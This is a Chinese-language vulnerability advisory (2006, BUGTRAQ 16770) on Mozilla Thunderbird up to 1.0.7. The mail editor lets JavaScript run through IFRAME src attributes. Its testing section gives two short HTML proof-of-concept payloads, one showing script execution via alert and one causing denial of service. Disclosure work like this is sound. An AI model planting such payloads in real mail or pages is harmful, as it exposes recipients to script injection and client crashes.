发布日期：2006-02-22
更新日期：2006-02-22

受影响系统：

Mozilla Thunderbird <= 1.0.7

不受影响系统：

Mozilla Thunderbird 1.5

描述：

---

BUGTRAQ  ID: 16770

Thunderbird是一款功能强大的邮件客户端，支持IMAP和POP邮件协议及HTML邮件格式。

Thunderbird对HTML格式邮件的处理上存在问题，远程攻击者可能利用此漏洞在客户端机器上执行恶意脚本代码。

Thunderbird的WYSIWYG渲染引擎没有充分地过滤JavaScript脚本，允许向IFRAME标签的SRC属性中写入JavaScript。这可能导致即使禁用了JavaScript的话，在用户编辑邮件或回复邮件时也可执行脚本或导致拒绝服务。

<*来源：Renaud Lifchitz （r.lifchitz@sysdream.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=114063304909882&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

* Javascript执行：

<html>
<body>
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>
</body>
</html>

* 拒绝服务：

<html>
<body>
<iframe src="javascript:parent.document.write('Found by www.sysdream.com
!')"></iframe>
</body>
</html>

建议：

---

厂商补丁：

Mozilla
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mozilla.org/

浏览次数：2972
严重程度：0（网友投票）